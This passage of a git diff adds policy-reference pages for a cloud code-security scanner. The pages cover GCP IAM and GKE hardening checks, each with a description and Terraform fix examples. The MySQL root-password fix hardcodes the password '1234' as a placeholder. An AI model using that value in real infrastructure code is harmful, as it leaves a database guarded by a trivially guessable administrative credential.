+This recommendation applies only to MySQL instances. +PostgreSQL does not offer a no-password setting in the cloud console. +If no administrative password is provided at MySQL instance creation, anyone can connect to the SQL database instance with administrative privileges. +The root password should be set to ensure only authorized users have these privileges. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* google_sql_user + + +[source,go] +---- +resource "google_sql_user" "root_with_password" { + name = "root" + instance = google_sql_database_instance.db_instance.name + host = "me.com" ++ password = "1234" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/google-cloud-iam-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/google-cloud-iam-policies.adoc new file mode 100644 index 000000000..c9b978f6c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/google-cloud-iam-policies.adoc @@ -0,0 +1,69 @@ +== Google Cloud IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-iam-1.adoc[GCP VM instance configured with default service account] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py[CKV_GCP_30] +|MEDIUM + + +|xref:bc-gcp-iam-10.adoc[GCP IAM primitive roles are in use] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py[CKV_GCP_49] +|MEDIUM + + +|xref:bc-gcp-iam-2.adoc[GCP VM instance using a default service account with full access to all Cloud APIs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py[CKV_GCP_31] +|MEDIUM + + 
+|xref:bc-gcp-iam-3.adoc[GCP IAM users are assigned Service Account User or Service Account Token Creator roles at project level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py[CKV_GCP_41] +|HIGH + + +|xref:bc-gcp-iam-4.adoc[GCP IAM Service account does have admin privileges] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py[CKV_GCP_42] +|HIGH + + +|xref:bc-gcp-iam-5.adoc[Roles impersonate or manage Service Accounts used at folder level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py[CKV_GCP_44] +|HIGH + + +|xref:bc-gcp-iam-6.adoc[Roles impersonate or manage Service Accounts used at organizational level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py[CKV_GCP_45] +|HIGH + + +|xref:bc-gcp-iam-7.adoc[Default Service Account is used at project level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py[CKV_GCP_46] +|HIGH + + +|xref:bc-gcp-iam-8.adoc[Default Service Account is used at organization level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py[CKV_GCP_47] +|HIGH + + +|xref:bc-gcp-iam-9.adoc[Default Service Account is used at folder level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py[CKV_GCP_48] +|HIGH + + +|xref:ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc[GCP Cloud KMS Key Rings are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml[CKV2_GCP_8] +|HIGH + + 
+|xref:ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc[A MySQL database instance allows anyone to connect with administrative privileges] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml[CKV2_GCP_7] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1.adoc new file mode 100644 index 000000000..ecd0cd477 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1.adoc @@ -0,0 +1,59 @@ +== GCP Kubernetes Engine Clusters have Stackdriver Logging disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53793c32-dd41-430f-bbea-2f002ddafe42 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py[CKV_GCP_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Stackdriver is the default logging solution for clusters deployed on GKE. +Stackdriver logging is deployed to a new cluster by default unless you explicitly opt out. +Stackdriver logging collects only the container's standard output and standard error streams. +To ingest logs, the Stackdriver logging agent must be deployed to each node in the cluster. +Stackdriver provides a single-pane-of-glass view of metrics, logs, and traces across Kubernetes Engine clusters and workloads. +We recommend you use Stackdriver logging as a unified data logging solution for GKE workloads unless additional observability tooling is already in place.
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_container_cluster" "primary" { + name = "my-gke-cluster" + location = "us-central1" + remove_default_node_pool = true + initial_node_count = 1 + logging_service = "logging.googleapis.com/kubernetes" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10.adoc new file mode 100644 index 000000000..7fe5ec244 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10.adoc @@ -0,0 +1,53 @@ +== GKE control plane is public + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f3d16b54-4fb0-4e19-a797-a257c0078c70 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py[CKV_GCP_18] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The GKE cluster control plane and nodes have internet-routable addresses that can be accessed from any IP address by default. +Direct internet access to nodes can be disabled by specifying the gcloud tool option *enable-private-nodes* at cluster creation. +We recommend you disable direct internet access to nodes at cluster creation and use master authorized networks and private nodes, so that the control plane can be reached only from allowlisted CIDRs, from nodes within the cluster VPC, and by Google management jobs. +We also recommend you limit the exposure of the cluster control plane and nodes to the internet. +These settings can only be set at cluster creation time and help ensure sensitive controllers are not exposed to external access.
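+ +The gcloud creation-time options referred to above can be combined in a single command; as a sketch (the cluster name and CIDR values here are illustrative): + +---- +gcloud container clusters create example-cluster \ + --enable-ip-alias \ + --enable-private-nodes \ + --master-ipv4-cidr 172.16.0.0/28 \ + --enable-master-authorized-networks \ + --master-authorized-networks 203.0.113.0/24 +---- +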
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_container_cluster" "primary" { + name = "marcellus-wallace" + location = "us-central1-a" + initial_node_count = 3 + private_cluster_config { + enable_private_nodes = true + } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-11.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-11.adoc new file mode 100644 index 000000000..e5869c95b --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-11.adoc @@ -0,0 +1,64 @@ +== GCP Kubernetes Engine Clusters Basic Authentication is set to Enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6e125379-081e-4b06-a7ba-f04da2f0901a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py[CKV_GCP_19] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +GKE supports multiple secure authentication methods, including service account bearer tokens, OAuth tokens, and x509 client certificates. +Basic authentication and client certificate issuance are disabled by default for clusters created with GKE 1.12 and later. +We recommend you use Cloud IAM, or an alternative secure authentication mechanism, as the identity provider for GKE clusters.
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_container_cluster" "pass2" { + name = "google_cluster" + monitoring_service = "monitoring.googleapis.com" + master_authorized_networks_config {} + master_auth { + username = "" + password = "" + client_certificate_config { + issue_client_certificate = false + } + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12.adoc new file mode 100644 index 000000000..f0aafcc44 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12.adoc @@ -0,0 +1,71 @@ +== GCP Kubernetes Engine Clusters have Master authorized networks disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e1b70bb4-bb77-4326-93d5-5dd9c5170d3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py[CKV_GCP_20] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Authorized networks allow allowlisting of specific CIDR ranges and permit IP addresses in those ranges to access the cluster master endpoint using HTTPS. +GKE uses both TLS and authentication to secure access to the cluster master endpoint from the public Internet. +This approach enables the flexibility to administer the cluster from anywhere. +We recommend you enable *master authorized networks* in GKE clusters. +Using authorized networks, you can further restrict access to specified sets of IP addresses.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name               = "marcellus-wallace"
+  location           = "us-central1-a"
+  initial_node_count = 3
+
+  master_auth {
+    client_certificate_config {
+      issue_client_certificate = false
+    }
+  }
+
+  master_authorized_networks_config {
+    cidr_blocks {
+      # Illustrative range; replace with the networks allowed to reach the master
+      cidr_block   = "10.10.10.0/24"
+      display_name = "foo"
+    }
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13.adoc
new file mode 100644
index 000000000..71fff3270
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13.adoc
@@ -0,0 +1,83 @@
+== GCP Kubernetes Engine Clusters without any label information
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1a4127c1-6acd-4aca-9010-4eaa776e3ee0
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEHasLabels.py[CKV_GCP_21]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Labels are key/value pairs attached to objects that specify identifying attributes meaningful and relevant to users, but do not directly imply semantics to the core system.
+Labels can be used to organize and select subsets of objects.
+Labels can be attached to objects at creation time and subsequently added and modified at any time.
+Each object can have a set of key/value labels defined.
+Each key must be unique for a given object.
+Labels enable users to map their own organizational structures onto system objects in a loosely coupled fashion, without requiring clients to store these mappings.
+We recommend you configure Kubernetes clusters with labels.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name               = "marcellus-wallace"
+  location           = "us-central1-a"
+  initial_node_count = 3
+
+  master_auth {
+    client_certificate_config {
+      issue_client_certificate = false
+    }
+  }
+
+  node_config {
+    # Google recommends custom service accounts that have cloud-platform scope and permissions granted via IAM Roles.
+    service_account = google_service_account.default.email
+    oauth_scopes = [
+      "https://www.googleapis.com/auth/cloud-platform"
+    ]
+
+    labels = {
+      foo = "bar"
+    }
+
+    tags = ["foo", "bar"]
+  }
+
+  timeouts {
+    create = "30m"
+    update = "40m"
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14.adoc
new file mode 100644
index 000000000..e8773b0c2
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14.adoc
@@ -0,0 +1,70 @@
+== GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e41fea47-678f-4aeb-97a8-bdf721d08e57
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py[CKV_GCP_22]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+GKE enables users to select the operating system image that runs on each node.
+You can also upgrade an existing cluster to use a different node image type.
+GKE supports several OS images using the main container runtime directly integrated with Kubernetes, including *cos_containerd* and *ubuntu_containerd*.
+We recommend you use *cos_containerd* and *ubuntu_containerd* to enhance node security.
+*Containerd* is an industry-standard container runtime component that regularly receives security fixes and patches, providing better support, security, and stability than other images.
+
+////
+=== Fix - Runtime
+
+
+*Gcloud CLI*
+
+
+Use the following command to upgrade the cluster to use the `COS` image:
+[,bash]
+----
+gcloud container clusters upgrade --image-type cos cluster-name
+----
+To upgrade a specific node pool, add the flag/argument `--node-pool node-pool-name`.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+Add the *image_type* argument to the *node_config* block in your *google_container_cluster* or *google_container_node_pool* resource:
+
+[source,go]
+----
+node_config {
+  image_type = "COS"
+}
+----
+
+This forces the cluster to recreate the nodes with the new configuration.
+For further information, see: https://www.terraform.io/docs/providers/google/r/container_cluster.html#image_type
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15.adoc
new file mode 100644
index 000000000..242ba0179
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15.adoc
@@ -0,0 +1,61 @@
+== GCP Kubernetes Engine Clusters have Alias IP disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 63b162f4-628c-4d4a-a094-63c12ebc4ba2
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py[CKV_GCP_23]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+In GKE, clusters can be set apart based on how they route traffic from
+one pod to another.
+A cluster that uses alias IP ranges is called a VPC-native cluster.
+A cluster that uses Google Cloud Routes is called a routes-based cluster.
+We recommend you create Kubernetes clusters with alias IP ranges enabled.
+Alias IP ranges allow Pods to directly access hosted services without using a NAT gateway.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name                     = "my-gke-cluster"
+  location                 = "us-central1"
+  remove_default_node_pool = true
+  initial_node_count       = 1
+
+  # An empty block is enough to enable alias IP ranges (VPC-native cluster)
+  ip_allocation_policy {}
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2.adoc
new file mode 100644
index 000000000..0ae333659
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2.adoc
@@ -0,0 +1,59 @@
+== GCP Kubernetes Engine Clusters have Legacy Authorization enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f57baa2a-6039-4a17-94e8-0be723bcdc75
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py[CKV_GCP_7]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Kubernetes RBAC (Role-Based Access Control) can be used to grant permissions to resources at the cluster and namespace level.
+It allows defining roles with rules containing a set of permissions.
+RBAC has significant security advantages and is now stable in Kubernetes, superseding the benefits of legacy authorization with ABAC (Attribute-Based Access Control).
+We recommend you disable ABAC authorization and use RBAC in GKE instead.
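+
+To illustrate RBAC's rule-based model, a namespace-scoped role granting read-only access to Pods can be sketched with the Terraform Kubernetes provider; the role name and namespace are illustrative:
+
+[source,go]
+----
+resource "kubernetes_role" "pod_reader" {
+  metadata {
+    name      = "pod-reader"
+    namespace = "default"
+  }
+
+  # An RBAC rule is a set of permissions: API groups, resources, and verbs
+  rule {
+    api_groups = [""]
+    resources  = ["pods"]
+    verbs      = ["get", "list", "watch"]
+  }
+}
+----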
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name                     = "my-gke-cluster"
+  location                 = "us-central1"
+  remove_default_node_pool = true
+  initial_node_count       = 1
+  logging_service          = "logging.googleapis.com/kubernetes"
+
+  # Disable legacy ABAC so that RBAC is used for authorization
+  enable_legacy_abac = false
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3.adoc
new file mode 100644
index 000000000..48eba25fe
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3.adoc
@@ -0,0 +1,60 @@
+== GCP Kubernetes Engine Clusters have Cloud Monitoring disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ca4b4654-d36a-4b17-a055-9c5063fa2f41
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py[CKV_GCP_8]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Stackdriver is the default logging solution for clusters deployed on GKE.
+Stackdriver logging is deployed to a new cluster by default unless you explicitly opt out.
+Stackdriver logging collects only the container's standard output and standard error streams.
+To ingest logs, the Stackdriver logging agent must be deployed to each node in the cluster.
+Stackdriver provides a single-pane-of-glass view of metrics, logs, and traces through Kubernetes Engine clusters and workloads.
+We recommend you use Stackdriver logging as a unified data logging solution for GKE workloads unless additional observability tooling is already in place.
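+
+The description above covers Stackdriver logging; the corresponding cluster argument can be sketched alongside the monitoring one this policy checks (the cluster name is illustrative):
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name               = "example-cluster"
+  location           = "us-central1"
+  initial_node_count = 1
+
+  # Stackdriver as the unified logging and monitoring backend
+  logging_service    = "logging.googleapis.com/kubernetes"
+  monitoring_service = "monitoring.googleapis.com/kubernetes"
+}
+----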
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name                     = "my-gke-cluster"
+  location                 = "us-central1"
+  remove_default_node_pool = true
+  initial_node_count       = 1
+  monitoring_service       = "monitoring.googleapis.com/kubernetes"
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4.adoc
new file mode 100644
index 000000000..7a58587a5
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4.adoc
@@ -0,0 +1,73 @@
+== GCP Kubernetes cluster node auto-repair configuration disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0e72ff6d-9d6e-4fa1-8c3b-b815b9e4d459
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py[CKV_GCP_9]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Auto-repairing mode in GKE is an automated service that identifies and repairs a failing node to maintain a healthy running state.
+GKE makes periodic checks on the health state of each node in the cluster.
+If a node fails consecutive health checks over an extended time period, GKE initiates a repair process for that node.
+We recommend you enable automatic node repair on Kubernetes clusters to keep mission-critical nodes running, ensure applications operate according to their pre-defined specs, and minimize downstream failures and redundant alerting and triage.
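+
+A complete node pool sketch with automatic repair enabled; the pool name is illustrative, and the block assumes an existing google_container_cluster named "primary":
+
+[source,go]
+----
+resource "google_container_node_pool" "repaired" {
+  name       = "example-node-pool"
+  cluster    = google_container_cluster.primary.id
+  node_count = 1
+
+  management {
+    # GKE recreates the node if it fails consecutive health checks
+    auto_repair = true
+  }
+}
+----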
+
+////
+=== Fix - Runtime
+
+
+*Gcloud CLI*
+
+
+Use the following command line to enable the node-pool automatic repair feature:
+[,bash]
+----
+gcloud container node-pools update pool-name \
+--cluster cluster-name \
+--zone compute-zone \
+--enable-autorepair
+----
+
+More information here: https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-repair
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+Add the following code block to your `google_container_node_pool` resource:
+
+[source,go]
+----
+management {
+  auto_repair = true
+}
+----
+
+If you do not have a separate node pool resource in your Terraform codebase, refer to the *Gcloud CLI* section.
+You will first need to recover the name of the node pool through the console or the CLI.
+As a best practice, delete the default node pool from the cluster and create a dedicated one using the *google_container_node_pool* resource.
+More information here: https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-repair
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5.adoc
new file mode 100644
index 000000000..055de2809
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5.adoc
@@ -0,0 +1,64 @@
+== GCP Kubernetes cluster node auto-upgrade configuration disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f70918b1-7c19-4de6-b851-967bea5648ba
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py[CKV_GCP_10]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Node *auto-upgrade* keeps nodes up-to-date with the latest
+cluster master version when your master is updated on your behalf.
+When a new cluster or node pool is created, node *auto-upgrade* is enabled by default.
+We recommend you ensure *auto-upgrade* is enabled.
+Automatic node upgrade ensures that when new binaries are released, you instantly get a fix with the latest security issues resolved.
+GKE will automatically ensure that security updates are applied and kept up to date.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_node_pool" "primary_preemptible_nodes" {
+  name       = "my-node-pool"
+  cluster    = google_container_cluster.primary.id
+  node_count = 1
+
+  management {
+    auto_upgrade = true
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6.adoc
new file mode 100644
index 000000000..d6143ed2e
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6.adoc
@@ -0,0 +1,62 @@
+== GCP Kubernetes Engine private cluster has private endpoint disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1478c66d-2911-4a19-80fb-ddc36ab2a270
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py[CKV_GCP_25]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Private clusters enable isolation of nodes from any inbound and outbound connectivity to the public internet.
+This is achieved as the nodes have internal RFC 1918 IP addresses only.
+In private clusters, the cluster master has private and public endpoints.
+You can configure which endpoint is enabled or disabled to control access from the public internet.
+We recommend you enable private clusters when creating Kubernetes clusters.
+By creating a private cluster, the nodes receive a reserved set of IP addresses, ensuring their workloads are isolated from the public internet.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+Add Block: *private_cluster_config* with attribute *enable_private_nodes* set to _true_.
+
+
+[source,go]
+----
+resource "google_container_cluster" "cluster" {
+...
++ private_cluster_config {
++   enable_private_nodes = true
++ }
+...
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7.adoc
new file mode 100644
index 000000000..9b4b6ce85
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7.adoc
@@ -0,0 +1,57 @@
+== GCP Kubernetes Engine Clusters have Network policy disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6ddbfdfe-3936-43d0-8157-97a7899beae6
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py[CKV_GCP_12]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Defining a network policy helps ensure that a compromised front-end service in your application cannot communicate directly with an external interface, for example, a billing or an accounting service several levels down.
+Network policy rules can ensure that Pods and Services in a given namespace cannot access other Pods or Services in a different namespace.
+We recommend you enable network policy on Kubernetes Engine clusters to determine which Pods and Services can access one another inside your cluster.
+This ensures that only the required services communicate with one another and that traffic not explicitly allowed cannot reach private clusters.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "pass" {
+  name = "google_cluster"
+
+  network_policy {
+    enabled = true
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8.adoc
new file mode 100644
index 000000000..e6829da23
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-8.adoc
@@ -0,0 +1,78 @@
+== GCP Kubernetes engine clusters have client certificate disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4b071d02-1ade-4935-a166-fd5ba04ae198
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py[CKV_GCP_13]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Kubernetes uses client certificates, bearer tokens, an authenticating proxy, HTTP basic auth, or OAuth apps to authenticate API requests through authentication plugins.
+As HTTP requests are made to the API server, plugins attempt to associate identity attributes with the request.
+We recommend you authenticate to Kubernetes Engine clusters using OAuth rather than client certificates.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_container_cluster" "primary" {
+  name               = "marcellus-wallace"
+  location           = "us-central1-a"
+  initial_node_count = 3
+
+  master_auth {
+    client_certificate_config {
+      issue_client_certificate = false
+    }
+  }
+
+  node_config {
+    # Google recommends custom service accounts that have cloud-platform scope and permissions granted via IAM Roles.
+    service_account = google_service_account.default.email
+    oauth_scopes = [
+      "https://www.googleapis.com/auth/cloud-platform"
+    ]
+
+    labels = {
+      foo = "bar"
+    }
+
+    tags = ["foo", "bar"]
+  }
+
